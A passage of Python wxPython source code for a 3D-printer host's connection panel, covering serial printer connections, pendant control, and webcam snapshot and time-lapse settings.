wx.LB_SINGLE)\n\t\tself.lbCamPort.SetFont(f)\n\t\tself.lbCamPort.SetToolTipString(\"Choose the port to which to connect\")\n\t\tif len(ports) == 0:\n\t\t\tself.lbCamPort.Disable()\n\t\telse:\n\t\t\tself.lbCamPort.Enable()\n\t\t\tself.lbCamPort.SetSelection(0)\n\t\tszCamera.AddSpacer((10, 10))\n\t\tszCamera.Add(self.lbCamPort)\n\t\t\n\t\tif len(ports) <= 0:\n\t\t\tself.cbCamActive.Enable(False)\n\t\t\tself.camActive = False\n\t\telse:\n\t\t\tself.cbCamActive.Enable(True)\n\n\t\tself.bSnapShot = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngSnapshot, size=BUTTONDIM)\n\t\tself.bSnapShot.SetToolTipString(\"Take a picture\")\n\t\tszCamCtrl.AddSpacer((10, 10))\n\t\tszCamCtrl.Add(self.bSnapShot, 1, wx.ALIGN_CENTER_HORIZONTAL, 0)\n\t\tself.Bind(wx.EVT_BUTTON, self.doSnapShot, self.bSnapShot)\n\t\tself.bSnapShot.Enable(False)\n\t\t\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\t\n\t\thb.Add(wx.StaticText(self, wx.ID_ANY, \"Brightness: \", size=(100, -1)), 1, wx.TOP, 20)\n\t\tself.slBrightness = wx.Slider(\n\t\t\tself, wx.ID_ANY, 50, 0, 100, size=(320, -1), \n\t\t\tstyle=wx.SL_HORIZONTAL | wx.SL_AUTOTICKS | wx.SL_LABELS \n\t\t\t)\n\t\tself.slBrightness.SetTickFreq(10, 1)\n\t\tself.slBrightness.SetPageSize(1)\n\t\thb.Add(self.slBrightness)\n\t\tszCamCtrl.AddSpacer((10, 10))\n\t\tszCamCtrl.Add(hb)\n\t\t\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\t\n\t\thb.Add(wx.StaticText(self, wx.ID_ANY, \"Contrast: \", size=(100, -1)), 1, wx.TOP, 20)\n\t\tself.slContrast = wx.Slider(\n\t\t\tself, wx.ID_ANY, 50, 0, 100, size=(320, -1), \n\t\t\tstyle=wx.SL_HORIZONTAL | wx.SL_AUTOTICKS | wx.SL_LABELS \n\t\t\t)\n\t\tself.slContrast.SetTickFreq(10, 1)\n\t\tself.slContrast.SetPageSize(1)\n\t\thb.Add(self.slContrast)\n\t\tszCamCtrl.AddSpacer((10, 10))\n\t\tszCamCtrl.Add(hb)\n\t\t\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\t\n\t\thb.Add(wx.StaticText(self, wx.ID_ANY, \"Saturation: \", size=(100, -1)), 1, wx.TOP, 20)\n\t\tself.slSaturation = wx.Slider(\n\t\t\tself, wx.ID_ANY, 50, 0, 100, size=(320, -1), \n\t\t\tstyle=wx.SL_HORIZONTAL | wx.SL_AUTOTICKS | wx.SL_LABELS \n\t\t\t)\n\t\tself.slSaturation.SetTickFreq(10, 1)\n\t\tself.slSaturation.SetPageSize(1)\n\t\thb.Add(self.slSaturation)\n\t\tszCamCtrl.AddSpacer((10, 10))\n\t\tszCamCtrl.Add(hb)\n\n\t\tszCamCtrl.AddSpacer((10, 10))\n\t\thszCamCtrl.AddSpacer((10, 10))\n\t\thszCamCtrl.Add(szCamCtrl)\n\t\thszCamCtrl.AddSpacer((10, 10))\n\n\t\tsboxTl = wx.StaticBox(self, wx.ID_ANY, \"Time Lapse Control\")\n\t\thszTlCtrl = wx.StaticBoxSizer(sboxTl, wx.HORIZONTAL)\n\t\tszTlCtrl = wx.BoxSizer(wx.VERTICAL)\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\t\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\tself.bTimeStart = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngTimestart, size=BUTTONDIM)\n\t\tself.bTimeStart.SetToolTipString(\"Start time lapse photography\")\n\t\thb.AddSpacer((10, 10))\n\t\thb.Add(self.bTimeStart)\n\t\tself.Bind(wx.EVT_BUTTON, self.doTimeLapseStart, self.bTimeStart)\n\t\tself.bTimeStart.Enable(False)\n\t\t\n\t\tself.bTimePause = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngTimepause, size=BUTTONDIM)\n\t\tself.bTimePause.SetToolTipString(\"Pause/resume time lapse photography\")\n\t\thb.AddSpacer((10, 10))\n\t\thb.Add(self.bTimePause)\n\t\tself.Bind(wx.EVT_BUTTON, self.doTimeLapsePause, self.bTimePause)\n\t\tself.bTimePause.Enable(False)\n\t\t\n\t\tself.bTimeStop = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngTimestop, size=BUTTONDIM)\n\t\tself.bTimeStop.SetToolTipString(\"Stop time lapse photography\")\n\t\thb.AddSpacer((10, 
10))\n\t\thb.Add(self.bTimeStop)\n\t\tself.Bind(wx.EVT_BUTTON, self.doTimeLapseStop, self.bTimeStop)\n\t\tself.bTimeStop.Enable(False)\n\t\t\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\tszTlCtrl.Add(hb)\n\t\t\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\t\n\t\thb.Add(wx.StaticText(self, wx.ID_ANY, \"Interval(sec): \"), 1, wx.TOP, 20)\n\t\thb.AddSpacer((20, 20))\n\t\tself.slInterval = wx.Slider(\n\t\t\tself, wx.ID_ANY, 10, 5, 300, size=(320, -1), \n\t\t\tstyle=wx.SL_HORIZONTAL | wx.SL_AUTOTICKS | wx.SL_LABELS \n\t\t\t)\n\t\tself.slInterval.SetTickFreq(10, 1)\n\t\tself.slInterval.SetPageSize(1)\n\t\thb.Add(self.slInterval)\n\t\t\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\tszTlCtrl.Add(hb)\n\t\t\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\t\n\t\tself.rbDuration = wx.RadioBox(\n\t\t\t\tself, wx.ID_ANY, \"Duration\", wx.DefaultPosition, wx.DefaultSize,\n\t\t\t\t[\"Count\", \"Seconds\"], 1, wx.RA_SPECIFY_COLS)\n\t\t\n\t\thb.Add(self.rbDuration)\n\t\thb.AddSpacer((20, 20))\n\t\t\n\t\tself.tcDuration = wx.TextCtrl(self, -1, \"10\", size=(80, -1))\n\t\thb.Add(self.tcDuration, 0, wx.TOP, 20)\n\t\t\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\tszTlCtrl.Add(hb)\n\t\t\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\t\t\n\t\tself.bDir = wx.BitmapButton(self, wx.ID_ANY, self.app.images.pngDirectory, size=BUTTONDIM)\n\t\thb.Add(self.bDir)\n\t\tself.Bind(wx.EVT_BUTTON, self.setTlDirectory, self.bDir)\n\t\thb.AddSpacer((20, 20))\n\n\t\tipfont = wx.Font(14, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD)\n\t\tdc = wx.WindowDC(self)\n\t\tdc.SetFont(ipfont)\n\t\tself.tlDir = os.path.join(self.settings.cmdfolder, \"tlpics\")\n\t\tw, h = dc.GetTextExtent(\"X\" * MAXDIRCHARS)\n\t\tw = int(0.75 * w)\n\t\tpadding = \" \" * MAXDIRCHARS\n\t\tself.txtDir = wx.StaticText(self, wx.ID_ANY, self.tlDir + padding, style=wx.ALIGN_LEFT, size=(w, h))\n\t\tself.txtDir.SetFont(ipfont)\n\t\thb.Add(self.txtDir, 1, wx.TOP, 12)\n\t\t\t\t\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\tszTlCtrl.Add(hb)\n\t\t\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\thb = wx.BoxSizer(wx.HORIZONTAL)\n\n\t\tw, h = dc.GetTextExtent(\"X\" * MAXSTATCHARS)\n\t\tw = int(0.75 * w)\n\t\tpadding = \" \" * MAXSTATCHARS\n\t\tself.txtTlStatus = wx.StaticText(self, wx.ID_ANY, padding, style=wx.ALIGN_LEFT, size=(w, h))\n\t\tself.txtTlStatus.SetFont(ipfont)\n\t\thb.Add(self.txtTlStatus)\n\t\t\n\t\tszTlCtrl.Add(hb)\n\t\tszTlCtrl.AddSpacer((10, 10))\n\t\t\n\t\thszTlCtrl.AddSpacer((20, 20))\n\t\thszTlCtrl.Add(szTlCtrl)\n\t\thszTlCtrl.AddSpacer((10, 10))\n\t\t\n\t\tszCamera.AddSpacer((10, 10))\n\t\tszsbCamera.AddSpacer((10, 10))\n\t\tszsbCamera.Add(szCamera)\n\t\tszsbCamera.AddSpacer((10, 10))\n\n\t\tsz = wx.BoxSizer(wx.HORIZONTAL)\n\t\tsz.AddSpacer((20, 20))\n\t\tsz.Add(szsbConnect)\n\t\tsz.AddSpacer((20, 20))\n\t\tsz.Add(szButtons)\n\t\tsz.AddSpacer((20, 20))\n\t\tsz.Add(szsbDisconnect)\n\t\tsz.AddSpacer((20, 20))\n\t\t\n\t\tself.sizer.AddSpacer((20, 20))\n\t\tself.sizer.Add(sz)\n\n\t\tsz = wx.BoxSizer(wx.HORIZONTAL)\n\t\tsz.AddSpacer((20, 20))\n\t\tsz.Add(szsbCamera)\n\t\tsz.AddSpacer((20, 20))\n\t\tsz.Add(hszCamCtrl)\n\t\tsz.AddSpacer((20, 20))\n\t\tsz.Add(hszTlCtrl)\n\t\t\n\t\tself.sizer.AddSpacer((50, 50))\n\t\tself.sizer.Add(sz)\n\n\t\tself.sizer.AddSpacer((20, 20))\n\t\tself.SetSizer(self.sizer)\n\t\t#self.lbCamPort.SetSelection(0)\n\t\t\n\tdef setTlDirectory(self, evt):\n\t\tdlg = wx.DirDialog(self, \"Choose a directory for timelapse pictures:\")\n\t\tif dlg.ShowModal() == wx.ID_OK:\n\t\t\tself.tlDir = 
dlg.GetPath()\n\t\t\tself.txtDir.SetLabel(self.tlDir)\n\n\t\tdlg.Destroy()\n\t\t\n\tdef doTimeLapseStart(self, evt):\n\t\tself.setCamProperties()\n\t\tinterval = self.slInterval.GetValue()\n\t\t\n\t\tdType = self.rbDuration.GetSelection()\n\t\ttry:\n\t\t\tdVal = int(self.tcDuration.GetValue())\n\t\texcept:\n\t\t\tdlg = wx.MessageDialog(self, \"Invalid duration Value\",\n\t\t\t\t\t'Invalid Value', wx.OK | wx.ICON_ERROR)\n\t\n\t\t\tdlg.ShowModal()\n\t\t\tdlg.Destroy()\n\t\t\treturn\n\t\t\t\n\t\tif dType == 0:\n\t\t\tcount = dVal\n\t\t\tseconds = None\n\t\telse:\n\t\t\tcount = None\n\t\t\tseconds = dVal\n\t\t\t\n\t\tself.webcam.timelapseStart(interval, count=count, duration=seconds, directory=self.tlDir)\n\t\tself.timeLapsePaused = False\n\t\tself.timeLapseRunning = True\n\t\tself.tlTick = TLTICKRATE\n\t\t\n\t\t#self.bSnapShot.Enable(False)\n\t\tself.bTimeStart.Enable(False)\n\t\tself.lbCamPort.Enable(False)\n\t\tself.cbCamActive.Enable(False)\n\n\t\tself.bTimePause.Enable(True)\n\t\tself.bTimeStop.Enable(True)\n\t\t\n\t\tself.getTLStatus()\n\t\t\n\tdef timeLapseEnded(self):\n\t\tself.timeLapsePaused = False\n\t\tself.timeLapseRunning = False\n\t\t\n\t\tself.updateTimeLapseStatus(\"\")\n\t\tself.bTimeStart.Enable(True)\n\t\tself.lbCamPort.Enable(True)\n\t\tself.cbCamActive.Enable(True)\n\n\t\tself.bTimePause.Enable(False)\n\t\tself.bTimeStop.Enable(False)\n\t\t\n\tdef updateTimeLapseStatus(self, text):\n\t\tself.txtTlStatus.SetLabel(text)\n\t\t\n\tdef doTimeLapsePause(self, evt):\n\t\tself.timeLapsePaused = not self.timeLapsePaused\n\t\tif self.timeLapsePaused:\n\t\t\tself.webcam.timelapsePause()\n\t\telse:\n\t\t\tself.webcam.timelapseResume()\n\t\t\n\t\tself.getTLStatus()\n\t\t\t\n\tdef doTimeLapseStop(self, evt):\n\t\tself.webcam.timelapseStop()\n\t\t\n\t\tself.bSnapShot.Enable(True)\n\t\tself.bTimeStart.Enable(True)\n\t\tself.lbCamPort.Enable(True)\n\t\tself.cbCamActive.Enable(True)\n\n\t\tself.bTimePause.Enable(False)\n\t\tself.bTimeStop.Enable(False)\n\t\t\n\t\tself.getTLStatus()\n\n\tdef loadConnections(self, cxlist):\n\t\tself.lbConnections.loadConnections(cxlist)\n\t\t\t\n\tdef isPendantActive(self):\n\t\treturn self.pendantActive\n\n\tdef doCamPort(self, evt):\n\t\tself.refreshCamPorts()\n\t\t\t\n\tdef refreshCamPorts(self):\n\t\tports = self.getCamPorts()\n\t\tself.lbCamPort.SetItems(ports)\n\n\t\tif len(ports) >= 1:\n\t\t\tself.lbCamPort.Enable(True)\n\t\t\tself.cbCamActive.Enable(True)\n\t\t\tif self.CameraPort is not None:\n\t\t\t\tif self.CameraPort in ports:\n\t\t\t\t\tself.lbCamPort.SetSelection(ports.index(self.CameraPort))\n\t\t\t\t\tself.cbCamActive.SetValue(True)\n\t\t\t\t\tself.camActive = True\n\t\t\t\t\tself.bSnapShot.Enable(True)\n\t\t\t\t\tself.bTimeStart.Enable(not self.timeLapseRunning)\n\t\t\t\telse:\n\t\t\t\t\tself.lbCamPort.SetSelection(0)\n\t\t\t\t\tself.cbCamActive.SetValue(False)\n\t\t\t\t\tself.camActive = False\n\t\t\t\t\tself.bSnapShot.Enable(False)\n\t\t\t\t\tself.bTimeStart.Enable(False)\n\t\t\telse:\n\t\t\t\tself.cbCamActive.SetValue(False)\n\t\t\t\tself.camActive = False\n\t\t\t\tself.bSnapShot.Enable(False)\n\t\t\t\tself.bTimeStart.Enable(False)\n\t\t\t\tself.lbCamPort.SetSelection(0)\n\t\telse:\n\t\t\tself.lbCamPort.Enable(False)\n\t\t\tself.cbCamActive.Enable(False)\n\t\t\tself.bSnapShot.Enable(False)\n\t\t\tself.bTimeStart.Enable(False)\n\t\t\tself.camActive = False\n\t\n\tdef getCamPorts(self):\n\t\tpl = glob.glob('/dev/video*')\n\t\treturn sorted(pl)\n\n\tdef checkCamActive(self, evt):\n\t\tself.camActive = evt.IsChecked()\n\t\tif 
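The duration check in doTimeLapseStart above wraps int() in a bare except, which also swallows KeyboardInterrupt and genuine bugs. A minimal hedged helper narrowing the catch (parse_duration is my name, not the repo's):

def parse_duration(text):
    """Return the duration as an int, or None when the text is not numeric."""
    try:
        return int(text)
    except ValueError:  # narrower than the bare except in the original
        return None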
self.camActive:\n\t\t\tport = \tself.lbCamPort.GetString(self.lbCamPort.GetSelection())\n\t\t\tself.bSnapShot.Enable(True)\n\t\t\tself.bTimeStart.Enable(not self.timeLapseRunning)\n\t\t\tself.lbCamPort.Enable(False)\n\t\t\tself.webcam.connect(port)\n\t\t\tp = self.getCamProperties()\n\t\t\tif not p is None:\n\t\t\t\tself.slSaturation.SetValue(p[0])\n\t\t\t\tself.vSaturation = p[0]\n\t\t\t\tself.slContrast.SetValue(p[1])\n\t\t\t\tself.vContrast = p[1]\n\t\t\t\tself.slBrightness.SetValue(p[2])\n\t\t\t\tself.vBrightness = p[2]\n\t\t\tself.CameraPort = port[:]\n\t\telse:\n\t\t\tself.bSnapShot.Enable(False)\n\t\t\tself.bTimeStart.Enable(False)\n\t\t\tself.lbCamPort.Enable(True)\n\t\t\tself.webcam.disconnect()\n\t\t\tself.CameraPort = None\n\n\tdef doSnapShot(self, evt):\n\t\tself.setCamProperties()\n\t\tpicfn = self.snapShot()\n\t\tif picfn is None:\n\t\t\tdlg = wx.MessageDialog(self, \"Error Taking Picture\",\n\t\t\t\t\t'Camera Error', wx.OK | wx.ICON_ERROR)\n\t\n\t\t\tdlg.ShowModal()\n\t\t\tdlg.Destroy()\n\t\telse:\n\t\t\ts = SnapFrame(self, picfn)\n\t\t\ts.Show()\n\t\t\t\n\tdef setCamProperties(self):\n\t\tvSat = self.slSaturation.GetValue()\n\t\tif vSat == self.vSaturation:\n\t\t\tvSat = None\n\t\telse:\n\t\t\tself.vSaturation = vSat\n\t\t\tvSat = float(vSat) / 100.0\n\t\t\t\n\t\tvCon = self.slContrast.GetValue()\n\t\tif vCon == self.vContrast:\n\t\t\tvCon = None\n\t\telse:\n\t\t\tself.vContrast = vCon\n\t\t\tvCon = float(vCon) / 100.0\n\t\t\t\n\t\tvBrt = self.slBrightness.GetValue()\n\t\tif vBrt == self.vBrightness:\n\t\t\tvBrt = None\n\t\telse:\n\t\t\tself.vBrightness = vBrt\n\t\t\tvBrt = float(vBrt) / 100.0\n\t\t\t\n\t\trc, xml = self.webcam.setProperties(vSat, vCon, vBrt)\n\t\t\n\t\t\t\n\tdef getCamProperties(self):\n\t\tif not self.camActive:\n\t\t\treturn None\n\t\t\n\t\trc, xml = self.webcam.getProperties()\n\t\tif not rc:\n\t\t\treturn None\n\t\t\n\t\txd = XMLDoc(xml).getRoot()\n\t\ttry:\n\t\t\tif str(xd.result) != \"success\":\n\t\t\t\treturn None\n\t\texcept AttributeError:\n\t\t\treturn None\n\t\t\n\t\ttry:\n\t\t\tsat = float(str(xd.properties.saturation))\n\t\texcept:\n\t\t\tsat = 0.125\n\t\t\n\t\ttry:\n\t\t\tcon = float(str(xd.properties.contrast))\n\t\texcept:\n\t\t\tcon = 0.125\n\t\t\n\t\ttry:\n\t\t\tbrt = float(str(xd.properties.brightness))\n\t\texcept:\n\t\t\tbrt = 0.5\n\t\t\t\n\t\treturn (int(sat * 100), int(con * 100), int(brt * 100))\n\t\t\t\n\tdef snapShot(self, block=True):\n\t\tif not self.camActive:\n\t\t\treturn None\n\t\t\n\t\trc, xml = self.webcam.picture(directory=\"pics\") # TODO - settings\n\t\tif not rc:\n\t\t\treturn None\n\t\t\t\n\t\txd = XMLDoc(xml).getRoot()\n\t\ttry:\n\t\t\treturn str(xd.filename)\n\t\texcept:\n\t\t\treturn None\n\t\n\tdef tick(self):\n\t\tif self.timeLapseRunning:\n\t\t\tself.tlTick -= 1\n\t\t\tif self.tlTick <= 0:\n\t\t\t\tself.tlTick = TLTICKRATE\n\t\t\t\tself.getTLStatus()\n\t\t\t\t\t\t\t\n\t\tcxlist = self.cm.getLists()[2]\n\t\tfor cx in cxlist:\n\t\t\tcx.tick()\n\t\t\t\n\tdef getTLStatus(self):\n\t\trc, xml = self.webcam.timelapseStatus()\n\t\tif not rc:\n\t\t\tself.timeLapseEnded()\n\t\telse:\n\t\t\txd = XMLDoc(xml).getRoot()\n\t\t\ttry:\n\t\t\t\tst = str(xd.result)\n\t\t\texcept AttributeError:\n\t\t\t\tself.timeLapseEnded()\n\t\t\telse:\n\t\t\t\tif st == \"idle\":\n\t\t\t\t\tself.timeLapseEnded()\n\t\t\t\telse:\n\t\t\t\t\titeration = int(str(xd.iterations))\n\t\t\t\t\tmaxIteration = int(str(xd.maxiterations))\n\t\t\t\t\tstatLine = st + \" - %d out of %d completed\" % (iteration, 
maxIteration)\n\t\t\t\t\tself.updateTimeLapseStatus(statLine)\n\n\t\n\tdef assertAllowPulls(self, flag):\n\t\tcxlist = self.cm.getLists()[2]\n\t\tfor cx in cxlist:\n\t\t\tcx.assertAllowPulls(flag)\n\t\t\n\tdef isAnyPrinting(self):\n\t\tcxlist = self.cm.getLists()[2]\n\t\tfor cx in cxlist:\n\t\t\tif cx.isPrinting():\n\t\t\t\treturn True\n\t\treturn False\n\n\tdef doPort(self, evt):\n\t\tself.refreshPorts()\n\t\t\n\tdef refreshPorts(self):\n\t\tports = self.cm.getLists(True)[1]\n\t\tself.lbPort.SetItems(ports)\n\t\tif len(ports) >= 1:\n\t\t\tself.bConnect.Enable(True)\n\t\t\tself.lbPort.Enable(True)\n\t\t\tself.lbPort.SetSelection(0)\n\t\telse:\n\t\t\tself.bConnect.Enable(False)\n\t\t\tself.lbPort.Enable(False)\n\t\t\t\n\t\tself.refreshCamPorts()\n\t\t\t\n\tdef getStatus(self):\n\t\treturn self.cm.getStatus()\n\t\t\t\n\tdef getTemps(self):\n\t\treturn self.cm.getTemps()\n\t\n\tdef pendantEvent(self, cmd):\n\t\tif cmd == \"pendant connected\":\n\t\t\t\tevt = PendantEvent(eid = PENDANT_CONNECT)\n\t\telif cmd == \"pendant disconnected\":\n\t\t\t\tevt = PendantEvent(eid = PENDANT_DISCONNECT)\n\t\telse:\n\t\t\t\tevt = PendantEvent(eid = PENDANT_COMMAND, cmdString=cmd)\n\t\ttry:\n\t\t\twx.PostEvent(self, evt)\n\t\texcept:\n\t\t\tpass\n\t\t\n\tdef pendantCommand(self, evt):\n\t\tif evt.eid == PENDANT_CONNECT:\n\t\t\tself.logger.LogMessage(\"Pendant connected\")\n\t\t\tself.pendantActive = True\n\t\t\tself.cm.activatePendant(True)\n\t\t\tconnections = self.cm.getLists()[2]\n\t\t\tself.loadConnections(connections)\n\n\t\telif evt.eid == PENDANT_DISCONNECT:\n\t\t\tself.logger.LogMessage(\"Pendant disconnected\")\n\t\t\tself.pendantActive = False\n\t\t\tconnections = self.cm.getLists()[2]\n\t\t\tself.loadConnections(connections)\n\t\telse:\n\t\t\tif TRACE:\n\t\t\t\tself.logger.LogMessage(evt.cmdString)\n\t\t\tself.cm.pendantCommand(evt.cmdString)\n\t\n\tdef doSetPendant(self, evt):\n\t\tif not self.pendantActive:\n\t\t\treturn\n\n\t\tcx = self.lbConnections.GetFirstSelected()\n\t\t\n\t\tself.cm.connectPendant(cx)\n\t\tconnections = self.cm.getLists()[2]\n\t\tself.loadConnections(connections)\n\n\tdef setPendant(self, cx):\n\t\tif not self.pendantActive:\n\t\t\treturn\n\t\t\n\t\tself.cm.connectPendant(cx)\n\t\tconnections = self.cm.getLists()[2]\n\t\tself.loadConnections(connections)\n\n\tdef doDisconnect(self, evt):\n\t\titem = self.lbConnections.GetFirstSelected()\n\t\tif item == -1:\n\t\t\tif self.cm.connectionCount() == 1:\n\t\t\t\titem = 0\n\t\t\telse:\n\t\t\t\tdlg = wx.MessageDialog(self, \"Please choose a connection to disconnect\",\n\t\t\t\t\t'No Connection Selected', wx.OK | wx.ICON_ERROR)\n\t\t\t\tdlg.ShowModal()\n\t\t\t\tdlg.Destroy()\n\t\t\t\treturn\n\t\t\n\t\tcxtext = self.lbConnections.GetItemText(item)\n\t\ttry:\n\t\t\tprtr = cxtext.split()[0]\n\t\t\tif prtr == \"*\":\n\t\t\t\ttry:\n\t\t\t\t\tprtr = cxtext.split()[1]\n\t\t\t\texcept:\n\t\t\t\t\tprtr = None\n\t\texcept:\n\t\t\tprtr = None\n\n\t\tif prtr is not None:\n\t\t\tcx = self.cm.connectionByPrinter(prtr)\n\t\t\tif cx is not None:\n\t\t\t\tif cx.isPrinting():\n\t\t\t\t\tif self.pgConnMgr.isAnyPrinting():\n\t\t\t\t\t\tdlg = wx.MessageDialog(self, \"Are you sure you want to disconnect printer %s while it is active\" % prtr,\n\t\t\t\t\t\t\t\t\t\t\t'Printing Active', wx.YES_NO | wx.NO_DEFAULT | wx.ICON_INFORMATION)\n\t\t\t\n\t\t\t\t\t\trc = dlg.ShowModal()\n\t\t\t\t\t\tdlg.Destroy()\n\t\t\n\t\t\t\t\t\tif rc != wx.ID_YES:\n\t\t\t\t\t\t\treturn\n\t\t\t\tself.disconnectByPrinter(prtr)\n\n\tdef disconnectByPrinter(self, prtr):\t\t\t\n\t\tif 
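doDisconnect above (and doReset further on) duplicate the same nested try/except parsing of the connection text. A hedged consolidation; the helper name and the default argument are my own:

def printer_from_connection_text(cxtext, default=None):
    # The first token names the printer, unless it is the pendant marker "*",
    # in which case the second token (if any) does.
    parts = cxtext.split()
    if not parts:
        return default
    if parts[0] == "*":
        return parts[1] if len(parts) > 1 else default
    return parts[0]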
self.cm.disconnectByPrinter(prtr):\n\t\t\t(printers, ports, connections) = self.cm.getLists()\n\t\t\tself.lbPort.SetItems(ports)\n\t\t\tself.lbPort.SetSelection(0)\n\t\t\tself.lbPrinter.SetItems(printers)\n\t\t\tself.lbPrinter.SetSelection(0)\n\t\t\tif len(ports) > 0 and len(printers) > 0:\n\t\t\t\tself.bConnect.Enable(True)\n\t\t\tif len(connections) == 0:\n\t\t\t\tself.bDisconnect.Enable(False)\n\t\t\t\tself.bReset.Enable(False)\n\t\t\tself.loadConnections(connections)\n\t\t\t\t\n\n\tdef doConnect(self, evt):\n\t\tport = \tself.lbPort.GetString(self.lbPort.GetSelection())\n\t\tbaud = \tself.lbBaud.GetString(self.lbBaud.GetSelection())\n\t\tprinter = \tself.lbPrinter.GetString(self.lbPrinter.GetSelection())\n\t\t\n\t\tif self.settings.resetonconnect:\n\t\t\tself.resetPort(port)\n\t\t\t\n\t\tif not self.cm.connect(printer, port, baud):\n\t\t\treturn\n\n\t\t(printers, ports, connections) = self.cm.getLists()\n\t\tself.lbPort.SetItems(ports)\n\t\tif len(ports) == 0:\n\t\t\tself.bConnect.Enable(False)\n\t\telse:\n\t\t\tself.lbPort.SetSelection(0)\n\t\tself.lbPrinter.SetItems(printers)\n\t\tif len(printers) == 0:\n\t\t\tself.bConnect.Enable(False)\n\t\telse:\n\t\t\tself.lbPrinter.SetSelection(0)\n\t\tself.loadConnections(connections)\n\t\tself.bDisconnect.Enable(True)\n\t\tself.bReset.Enable(True)\n\t\t\n\tdef resetPort(self, port):\n\t\tif _platform == \"linux\" or _platform == \"linux2\":\n\t\t\ttry:\n\t\t\t\tfp = open(port, \"r\")\n\t\t\t\tnew = termios.tcgetattr(fp)\n\t\t\t\tnew[2] = new[2] | ~termios.CREAD\n\t\t\t\ttermios.tcsetattr(fp, termios.TCSANOW, new)\n\t\t\t\tfp.close()\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\n\tdef onClose(self):\n\t\tself.webcam.exit()\n\t\tself.cm.disconnectAll()\n\t\tself.bDisconnect.Enable(False)\n\n\tdef doReset(self, evt):\n\t\titem = self.lbConnections.GetFirstSelected()\n\t\tif item == -1:\n\t\t\tif self.cm.connectionCount() == 1:\n\t\t\t\titem = 0\n\t\t\telse:\n\t\t\t\tdlg = wx.MessageDialog(self, \"Please choose a connection to reset\",\n\t\t\t\t\t'No Connection Selected', wx.OK | wx.ICON_ERROR)\n\t\t\t\tdlg.ShowModal()\n\t\t\t\tdlg.Destroy()\n\t\t\t\treturn\n\t\t\t\n\t\tconnections = self.cm.getLists()[2]\n\t\tcx = connections[item]\n\n\t\tcxtext = self.lbConnections.GetItemText(item)\n\t\ttry:\n\t\t\tprtr = cxtext.split()[0]\n\t\t\tif prtr == \"*\":\n\t\t\t\ttry:\n\t\t\t\t\tprtr = cxtext.split()[1]\n\t\t\t\texcept:\n\t\t\t\t\tprtr = \"\"\n\t\texcept:\n\t\t\tprtr = \"\"\n\n\n\t\tif cx.reprap is not None:\n\t\t\tdlg = wx.MessageDialog(self, \"Are you sure you want to reset printer %s\" % prtr,\n\t\t\t\t\t\t\t\t'Printer Reset', wx.YES_NO | wx.NO_DEFAULT | wx.ICON_INFORMATION)\n\t\t\n\t\t\trc = dlg.ShowModal()\n\t\t\tdlg.Destroy()\n\n\t\t\tif rc == wx.ID_YES:\n\t\t\t\tcx.reprap.reset()\n\t\t\t\tif cx.prtmon is not None:\n\t\t\t\t\tcx.prtmon.printerReset()\n\nclass ActiveConnectionCtrl(wx.ListCtrl):\t\n\tdef __init__(self, parent, images):\n\t\t\n\t\tf = wx.Font(12, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD)\n\t\tdc = wx.ScreenDC()\n\t\tdc.SetFont(f)\n\t\tfontHeight = dc.GetTextExtent(\"Xy\")[1]\n\t\t\n\t\tcolWidths = [150, 200]\n\t\tcolTitles = [\"Printer\", \"Port\"]\n\t\t\n\t\ttotwidth = 20;\n\t\tfor w in colWidths:\n\t\t\ttotwidth += w\n\t\t\n\t\twx.ListCtrl.__init__(self, parent, wx.ID_ANY, size=(totwidth, fontHeight*(VISIBLELISTSIZE+1)),\n\t\t\tstyle=wx.LC_REPORT|wx.LC_VIRTUAL|wx.LC_HRULES|wx.LC_VRULES|wx.LC_SINGLE_SEL\n\t\t\t)\n\n\t\tself.parent = parent\t\t\n\t\tself.il = wx.ImageList(16, 
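resetPort above computes new[2] | ~termios.CREAD, which ORs in the complement mask and so sets nearly every control flag; clearing the receiver-enable bit is conventionally AND-NOT. A hedged Linux-only sketch, best-effort like the original but with a narrower except:

import termios

def reset_port(port):
    try:
        with open(port) as fp:
            attrs = termios.tcgetattr(fp)
            attrs[2] &= ~termios.CREAD  # clear, rather than set, CREAD
            termios.tcsetattr(fp, termios.TCSANOW, attrs)
    except (OSError, termios.error):
        pass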
16)\n\t\tself.il.Add(images.pngNopendant)\n\t\tself.il.Add(images.pngPendant)\n\t\tself.SetImageList(self.il, wx.IMAGE_LIST_SMALL)\n\n\t\tself.cxList = []\n\t\t\n\t\tself.SetFont(f)\n\t\tfor i in range(len(colWidths)):\n\t\t\tself.InsertColumn(i, colTitles[i])\n\t\t\tself.SetColumnWidth(i, colWidths[i])\n\t\t\n\t\tself.SetItemCount(0)\n\t\t\n\t\tself.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.doSetPendant)\n\t\t\n\tdef doSetPendant(self, evt):\n\t\tsx = self.GetFirstSelected()\n\t\tif sx == -1:\n\t\t\treturn\n\t\tself.parent.setPendant(sx)\n\t\n\tdef loadConnections(self, cxList):\n\t\tself.cxList = cxList\n\t\tself.SetItemCount(len(cxList))\n\t\tself.Refresh()\n\t\n\tdef OnGetItemText(self, item, col):\n\t\tif col == 0:\n\t\t\treturn self.cxList[item].printer\n\t\telif col == 1:\n\t\t\treturn self.cxList[item].port\n\t\telse:\n\t\t\treturn \"\"\n\n\tdef OnGetItemImage(self, item):\n\t\tif self.parent.isPendantActive() and self.cxList[item].hasPendant():\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\t\n\tdef 